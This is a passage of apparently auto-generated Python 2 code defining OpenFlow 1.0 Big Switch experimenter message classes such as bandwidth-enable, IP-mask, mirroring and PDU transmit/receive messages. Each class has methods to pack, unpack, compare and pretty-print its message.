with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.breakable()
q.text('}')
bsn_header.subtypes[19] = bsn_bw_enable_get_request
class bsn_bw_enable_set_reply(bsn_header):
version = 1
type = 4
experimenter = 6035143
subtype = 23
def __init__(self, xid=None, enable=None, status=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if enable != None:
self.enable = enable
else:
self.enable = 0
if status != None:
self.status = status
else:
self.status = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!L", self.subtype))
packed.append(struct.pack("!L", self.enable))
packed.append(struct.pack("!L", self.status))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = bsn_bw_enable_set_reply()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 4)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_experimenter = reader.read("!L")[0]
assert(_experimenter == 6035143)
_subtype = reader.read("!L")[0]
assert(_subtype == 23)
obj.enable = reader.read("!L")[0]
obj.status = reader.read("!L")[0]
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.enable != other.enable: return False
if self.status != other.status: return False
return True
def pretty_print(self, q):
q.text("bsn_bw_enable_set_reply {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("enable = ");
q.text("%#x" % self.enable)
q.text(","); q.breakable()
q.text("status = ");
q.text("%#x" % self.status)
q.breakable()
q.text('}')
bsn_header.subtypes[23] = bsn_bw_enable_set_reply
class bsn_bw_enable_set_request(bsn_header):
version = 1
type = 4
experimenter = 6035143
subtype = 18
def __init__(self, xid=None, enable=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if enable != None:
self.enable = enable
else:
self.enable = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!L", self.subtype))
packed.append(struct.pack("!L", self.enable))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = bsn_bw_enable_set_request()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 4)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_experimenter = reader.read("!L")[0]
assert(_experimenter == 6035143)
_subtype = reader.read("!L")[0]
assert(_subtype == 18)
obj.enable = reader.read("!L")[0]
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.enable != other.enable: return False
return True
def pretty_print(self, q):
q.text("bsn_bw_enable_set_request {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("enable = ");
q.text("%#x" % self.enable)
q.breakable()
q.text('}')
bsn_header.subtypes[18] = bsn_bw_enable_set_request
class bsn_get_interfaces_reply(bsn_header):
version = 1
type = 4
experimenter = 6035143
subtype = 10
def __init__(self, xid=None, interfaces=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if interfaces != None:
self.interfaces = interfaces
else:
self.interfaces = []
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!L", self.subtype))
packed.append(loxi.generic_util.pack_list(self.interfaces))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = bsn_get_interfaces_reply()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 4)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_experimenter = reader.read("!L")[0]
assert(_experimenter == 6035143)
_subtype = reader.read("!L")[0]
assert(_subtype == 10)
obj.interfaces = loxi.generic_util.unpack_list(reader, ofp.common.bsn_interface.unpack)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.interfaces != other.interfaces: return False
return True
def pretty_print(self, q):
q.text("bsn_get_interfaces_reply {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("interfaces = ");
q.pp(self.interfaces)
q.breakable()
q.text('}')
bsn_header.subtypes[10] = bsn_get_interfaces_reply
class bsn_get_interfaces_request(bsn_header):
version = 1
type = 4
experimenter = 6035143
subtype = 9
def __init__(self, xid=None):
if xid != None:
self.xid = xid
else:
self.xid = None
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!L", self.subtype))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = bsn_get_interfaces_request()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 4)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_experimenter = reader.read("!L")[0]
assert(_experimenter == 6035143)
_subtype = reader.read("!L")[0]
assert(_subtype == 9)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
return True
def pretty_print(self, q):
q.text("bsn_get_interfaces_request {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.breakable()
q.text('}')
bsn_header.subtypes[9] = bsn_get_interfaces_request
class bsn_get_ip_mask_reply(bsn_header):
version = 1
type = 4
experimenter = 6035143
subtype = 2
def __init__(self, xid=None, index=None, mask=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if index != None:
self.index = index
else:
self.index = 0
if mask != None:
self.mask = mask
else:
self.mask = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!L", self.subtype))
packed.append(struct.pack("!B", self.index))
packed.append('\x00' * 3)
packed.append(struct.pack("!L", self.mask))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = bsn_get_ip_mask_reply()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 4)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_experimenter = reader.read("!L")[0]
assert(_experimenter == 6035143)
_subtype = reader.read("!L")[0]
assert(_subtype == 2)
obj.index = reader.read("!B")[0]
reader.skip(3)
obj.mask = reader.read("!L")[0]
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.index != other.index: return False
if self.mask != other.mask: return False
return True
def pretty_print(self, q):
q.text("bsn_get_ip_mask_reply {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("index = ");
q.text("%#x" % self.index)
q.text(","); q.breakable()
q.text("mask = ");
q.text("%#x" % self.mask)
q.breakable()
q.text('}')
bsn_header.subtypes[2] = bsn_get_ip_mask_reply
class bsn_get_ip_mask_request(bsn_header):
version = 1
type = 4
experimenter = 6035143
subtype = 1
def __init__(self, xid=None, index=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if index != None:
self.index = index
else:
self.index = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!L", self.subtype))
packed.append(struct.pack("!B", self.index))
packed.append('\x00' * 7)
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = bsn_get_ip_mask_request()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 4)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_experimenter = reader.read("!L")[0]
assert(_experimenter == 6035143)
_subtype = reader.read("!L")[0]
assert(_subtype == 1)
obj.index = reader.read("!B")[0]
reader.skip(7)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.index != other.index: return False
return True
def pretty_print(self, q):
q.text("bsn_get_ip_mask_request {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("index = ");
q.text("%#x" % self.index)
q.breakable()
q.text('}')
bsn_header.subtypes[1] = bsn_get_ip_mask_request
class bsn_get_l2_table_reply(bsn_header):
version = 1
type = 4
experimenter = 6035143
subtype = 14
def __init__(self, xid=None, l2_table_enable=None, l2_table_priority=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if l2_table_enable != None:
self.l2_table_enable = l2_table_enable
else:
self.l2_table_enable = 0
if l2_table_priority != None:
self.l2_table_priority = l2_table_priority
else:
self.l2_table_priority = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!L", self.subtype))
packed.append(struct.pack("!B", self.l2_table_enable))
packed.append('\x00' * 1)
packed.append(struct.pack("!H", self.l2_table_priority))
packed.append('\x00' * 4)
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = bsn_get_l2_table_reply()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 4)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_experimenter = reader.read("!L")[0]
assert(_experimenter == 6035143)
_subtype = reader.read("!L")[0]
assert(_subtype == 14)
obj.l2_table_enable = reader.read("!B")[0]
reader.skip(1)
obj.l2_table_priority = reader.read("!H")[0]
reader.skip(4)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.l2_table_enable != other.l2_table_enable: return False
if self.l2_table_priority != other.l2_table_priority: return False
return True
def pretty_print(self, q):
q.text("bsn_get_l2_table_reply {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("l2_table_enable = ");
q.text("%#x" % self.l2_table_enable)
q.text(","); q.breakable()
q.text("l2_table_priority = ");
q.text("%#x" % self.l2_table_priority)
q.breakable()
q.text('}')
bsn_header.subtypes[14] = bsn_get_l2_table_reply
class bsn_get_l2_table_request(bsn_header):
version = 1
type = 4
experimenter = 6035143
subtype = 13
def __init__(self, xid=None):
if xid != None:
self.xid = xid
else:
self.xid = None
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!L", self.subtype))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = bsn_get_l2_table_request()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 4)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_experimenter = reader.read("!L")[0]
assert(_experimenter == 6035143)
_subtype = reader.read("!L")[0]
assert(_subtype == 13)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
return True
def pretty_print(self, q):
q.text("bsn_get_l2_table_request {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.breakable()
q.text('}')
bsn_header.subtypes[13] = bsn_get_l2_table_request
class bsn_get_mirroring_reply(bsn_header):
version = 1
type = 4
experimenter = 6035143
subtype = 5
def __init__(self, xid=None, report_mirror_ports=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if report_mirror_ports != None:
self.report_mirror_ports = report_mirror_ports
else:
self.report_mirror_ports = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!L", self.subtype))
packed.append(struct.pack("!B", self.report_mirror_ports))
packed.append('\x00' * 3)
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = bsn_get_mirroring_reply()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 4)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_experimenter = reader.read("!L")[0]
assert(_experimenter == 6035143)
_subtype = reader.read("!L")[0]
assert(_subtype == 5)
obj.report_mirror_ports = reader.read("!B")[0]
reader.skip(3)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.report_mirror_ports != other.report_mirror_ports: return False
return True
def pretty_print(self, q):
q.text("bsn_get_mirroring_reply {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("report_mirror_ports = ");
q.text("%#x" % self.report_mirror_ports)
q.breakable()
q.text('}')
bsn_header.subtypes[5] = bsn_get_mirroring_reply
class bsn_get_mirroring_request(bsn_header):
version = 1
type = 4
experimenter = 6035143
subtype = 4
def __init__(self, xid=None, report_mirror_ports=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if report_mirror_ports != None:
self.report_mirror_ports = report_mirror_ports
else:
self.report_mirror_ports = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!L", self.subtype))
packed.append(struct.pack("!B", self.report_mirror_ports))
packed.append('\x00' * 3)
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = bsn_get_mirroring_request()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 4)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_experimenter = reader.read("!L")[0]
assert(_experimenter == 6035143)
_subtype = reader.read("!L")[0]
assert(_subtype == 4)
obj.report_mirror_ports = reader.read("!B")[0]
reader.skip(3)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.report_mirror_ports != other.report_mirror_ports: return False
return True
def pretty_print(self, q):
q.text("bsn_get_mirroring_request {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("report_mirror_ports = ");
q.text("%#x" % self.report_mirror_ports)
q.breakable()
q.text('}')
bsn_header.subtypes[4] = bsn_get_mirroring_request
class bsn_hybrid_get_reply(bsn_header):
version = 1
type = 4
experimenter = 6035143
subtype = 28
def __init__(self, xid=None, hybrid_enable=None, hybrid_version=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if hybrid_enable != None:
self.hybrid_enable = hybrid_enable
else:
self.hybrid_enable = 0
if hybrid_version != None:
self.hybrid_version = hybrid_version
else:
self.hybrid_version = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!L", self.subtype))
packed.append(struct.pack("!B", self.hybrid_enable))
packed.append('\x00' * 1)
packed.append(struct.pack("!H", self.hybrid_version))
packed.append('\x00' * 4)
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = bsn_hybrid_get_reply()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 4)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_experimenter = reader.read("!L")[0]
assert(_experimenter == 6035143)
_subtype = reader.read("!L")[0]
assert(_subtype == 28)
obj.hybrid_enable = reader.read("!B")[0]
reader.skip(1)
obj.hybrid_version = reader.read("!H")[0]
reader.skip(4)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.hybrid_enable != other.hybrid_enable: return False
if self.hybrid_version != other.hybrid_version: return False
return True
def pretty_print(self, q):
q.text("bsn_hybrid_get_reply {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("hybrid_enable = ");
q.text("%#x" % self.hybrid_enable)
q.text(","); q.breakable()
q.text("hybrid_version = ");
q.text("%#x" % self.hybrid_version)
q.breakable()
q.text('}')
bsn_header.subtypes[28] = bsn_hybrid_get_reply
class bsn_hybrid_get_request(bsn_header):
version = 1
type = 4
experimenter = 6035143
subtype = 27
def __init__(self, xid=None):
if xid != None:
self.xid = xid
else:
self.xid = None
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!L", self.subtype))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = bsn_hybrid_get_request()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 4)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_experimenter = reader.read("!L")[0]
assert(_experimenter == 6035143)
_subtype = reader.read("!L")[0]
assert(_subtype == 27)
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
return True
def pretty_print(self, q):
q.text("bsn_hybrid_get_request {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.breakable()
q.text('}')
bsn_header.subtypes[27] = bsn_hybrid_get_request
class bsn_pdu_rx_reply(bsn_header):
version = 1
type = 4
experimenter = 6035143
subtype = 34
def __init__(self, xid=None, status=None, port_no=None, slot_num=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if status != None:
self.status = status
else:
self.status = 0
if port_no != None:
self.port_no = port_no
else:
self.port_no = 0
if slot_num != None:
self.slot_num = slot_num
else:
self.slot_num = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!L", self.subtype))
packed.append(struct.pack("!L", self.status))
packed.append(util.pack_port_no(self.port_no))
packed.append(struct.pack("!B", self.slot_num))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = bsn_pdu_rx_reply()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 4)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_experimenter = reader.read("!L")[0]
assert(_experimenter == 6035143)
_subtype = reader.read("!L")[0]
assert(_subtype == 34)
obj.status = reader.read("!L")[0]
obj.port_no = util.unpack_port_no(reader)
obj.slot_num = reader.read("!B")[0]
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.status != other.status: return False
if self.port_no != other.port_no: return False
if self.slot_num != other.slot_num: return False
return True
def pretty_print(self, q):
q.text("bsn_pdu_rx_reply {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("status = ");
q.text("%#x" % self.status)
q.text(","); q.breakable()
q.text("port_no = ");
q.text(util.pretty_port(self.port_no))
q.text(","); q.breakable()
q.text("slot_num = ");
q.text("%#x" % self.slot_num)
q.breakable()
q.text('}')
bsn_header.subtypes[34] = bsn_pdu_rx_reply
class bsn_pdu_rx_request(bsn_header):
version = 1
type = 4
experimenter = 6035143
subtype = 33
def __init__(self, xid=None, timeout_ms=None, port_no=None, slot_num=None, data=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if timeout_ms != None:
self.timeout_ms = timeout_ms
else:
self.timeout_ms = 0
if port_no != None:
self.port_no = port_no
else:
self.port_no = 0
if slot_num != None:
self.slot_num = slot_num
else:
self.slot_num = 0
if data != None:
self.data = data
else:
self.data = ''
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!L", self.subtype))
packed.append(struct.pack("!L", self.timeout_ms))
packed.append(util.pack_port_no(self.port_no))
packed.append(struct.pack("!B", self.slot_num))
packed.append('\x00' * 3)
packed.append(self.data)
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = bsn_pdu_rx_request()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 4)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_experimenter = reader.read("!L")[0]
assert(_experimenter == 6035143)
_subtype = reader.read("!L")[0]
assert(_subtype == 33)
obj.timeout_ms = reader.read("!L")[0]
obj.port_no = util.unpack_port_no(reader)
obj.slot_num = reader.read("!B")[0]
reader.skip(3)
obj.data = str(reader.read_all())
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.timeout_ms != other.timeout_ms: return False
if self.port_no != other.port_no: return False
if self.slot_num != other.slot_num: return False
if self.data != other.data: return False
return True
def pretty_print(self, q):
q.text("bsn_pdu_rx_request {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("timeout_ms = ");
q.text("%#x" % self.timeout_ms)
q.text(","); q.breakable()
q.text("port_no = ");
q.text(util.pretty_port(self.port_no))
q.text(","); q.breakable()
q.text("slot_num = ");
q.text("%#x" % self.slot_num)
q.text(","); q.breakable()
q.text("data = ");
q.pp(self.data)
q.breakable()
q.text('}')
bsn_header.subtypes[33] = bsn_pdu_rx_request
class bsn_pdu_rx_timeout(bsn_header):
version = 1
type = 4
experimenter = 6035143
subtype = 35
def __init__(self, xid=None, port_no=None, slot_num=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if port_no != None:
self.port_no = port_no
else:
self.port_no = 0
if slot_num != None:
self.slot_num = slot_num
else:
self.slot_num = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!L", self.subtype))
packed.append(util.pack_port_no(self.port_no))
packed.append(struct.pack("!B", self.slot_num))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = bsn_pdu_rx_timeout()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 4)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_experimenter = reader.read("!L")[0]
assert(_experimenter == 6035143)
_subtype = reader.read("!L")[0]
assert(_subtype == 35)
obj.port_no = util.unpack_port_no(reader)
obj.slot_num = reader.read("!B")[0]
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.port_no != other.port_no: return False
if self.slot_num != other.slot_num: return False
return True
def pretty_print(self, q):
q.text("bsn_pdu_rx_timeout {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("port_no = ");
q.text(util.pretty_port(self.port_no))
q.text(","); q.breakable()
q.text("slot_num = ");
q.text("%#x" % self.slot_num)
q.breakable()
q.text('}')
bsn_header.subtypes[35] = bsn_pdu_rx_timeout
class bsn_pdu_tx_reply(bsn_header):
version = 1
type = 4
experimenter = 6035143
subtype = 32
def __init__(self, xid=None, status=None, port_no=None, slot_num=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if status != None:
self.status = status
else:
self.status = 0
if port_no != None:
self.port_no = port_no
else:
self.port_no = 0
if slot_num != None:
self.slot_num = slot_num
else:
self.slot_num = 0
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!L", self.subtype))
packed.append(struct.pack("!L", self.status))
packed.append(util.pack_port_no(self.port_no))
packed.append(struct.pack("!B", self.slot_num))
length = sum([len(x) for x in packed])
packed[2] = struct.pack("!H", length)
return ''.join(packed)
@staticmethod
def unpack(reader):
obj = bsn_pdu_tx_reply()
_version = reader.read("!B")[0]
assert(_version == 1)
_type = reader.read("!B")[0]
assert(_type == 4)
_length = reader.read("!H")[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read("!L")[0]
_experimenter = reader.read("!L")[0]
assert(_experimenter == 6035143)
_subtype = reader.read("!L")[0]
assert(_subtype == 32)
obj.status = reader.read("!L")[0]
obj.port_no = util.unpack_port_no(reader)
obj.slot_num = reader.read("!B")[0]
return obj
def __eq__(self, other):
if type(self) != type(other): return False
if self.xid != other.xid: return False
if self.status != other.status: return False
if self.port_no != other.port_no: return False
if self.slot_num != other.slot_num: return False
return True
def pretty_print(self, q):
q.text("bsn_pdu_tx_reply {")
with q.group():
with q.indent(2):
q.breakable()
q.text("xid = ");
if self.xid != None:
q.text("%#x" % self.xid)
else:
q.text('None')
q.text(","); q.breakable()
q.text("status = ");
q.text("%#x" % self.status)
q.text(","); q.breakable()
q.text("port_no = ");
q.text(util.pretty_port(self.port_no))
q.text(","); q.breakable()
q.text("slot_num = ");
q.text("%#x" % self.slot_num)
q.breakable()
q.text('}')
bsn_header.subtypes[32] = bsn_pdu_tx_reply
class bsn_pdu_tx_request(bsn_header):
version = 1
type = 4
experimenter = 6035143
subtype = 31
def __init__(self, xid=None, tx_interval_ms=None, port_no=None, slot_num=None, data=None):
if xid != None:
self.xid = xid
else:
self.xid = None
if tx_interval_ms != None:
self.tx_interval_ms = tx_interval_ms
else:
self.tx_interval_ms = 0
if port_no != None:
self.port_no = port_no
else:
self.port_no = 0
if slot_num != None:
self.slot_num = slot_num
else:
self.slot_num = 0
if data != None:
self.data = data
else:
self.data = ''
return
def pack(self):
packed = []
packed.append(struct.pack("!B", self.version))
packed.append(struct.pack("!B", self.type))
packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
packed.append(struct.pack("!L", self.xid))
packed.append(struct.pack("!L", self.experimenter))
packed.append(struct.pack("!L", self.subtype))
packed.append(struct.pack("!L", self.tx_interval_ms))
packed.append(util.pack_port_no(self.port_no))
packed.append(struct.pack("!B", self.slot_num))
packed.append('\x00' * 3)
